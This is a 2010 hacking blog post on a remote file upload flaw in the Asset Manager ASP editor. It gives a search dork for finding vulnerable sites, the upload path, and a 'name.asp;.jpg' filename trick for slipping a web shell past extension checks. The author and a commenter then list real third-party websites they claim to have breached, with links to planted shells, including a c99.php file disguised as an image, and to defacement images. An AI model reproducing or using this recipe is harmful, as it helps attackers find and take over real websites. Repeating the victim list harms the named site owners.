Friday, November 5, 2010

Asset Manager Remote File upload Vulnerability

by Unknown

Asset Manager Remote File upload Vulnerability

Vunlerability :Remote File upload


Risk  :High

Dork :inurl:Editor/assetmanager/assetmanager.asp


Exploit:

http://[PATH]/assetmanager/assetmanager.asp


and upload your shell .... dz4all.asp;.jpg

Thanks to Dz4all



I am not uploading any shell im just uploaded the image. If u wnt to learn how to upload the shell try it yourself
here is one example of shell uploaded by me
website
http://shootright.co.uk/

Shell link:-

http://shootright.co.uk/images/870.asp;me.jpg

 

 

Image uploaded Links  

http://www.aiu.edu/


image
http://www.aiu.edu/assets/public/a/avhack.JPG



http://www.licityguide.com/
image
http://www.licityguide.com/Editor/assets/avhack.jpg

About Admin
Hello Myself Avinash the owner of Hackerzadda.com. This is one stop solution site for all your tech and hack realted queries.You will find answer to all your web hack related quries here.

1 comment:

  1. Nrupen MasramNovember 6, 2010 at 5:14 AM

    Hi Avi Check this out,
    don't publish this comment, just check those sites.


    http://www.aiu.edu/assets/public/hacked%20by%20av/home.jpg

    http://www.licityguide.com//Editor/assets/logo.jpg

    http://www.licityguide.com/Editor/assets/qqq/c99.php.jpg

    http://www.inntrondelagbrannvesen.no/dokumenter/maquina.png

    http://bamasociados.com/

    i want c99.php shell script if you have one.
    Thanks

    ReplyDelete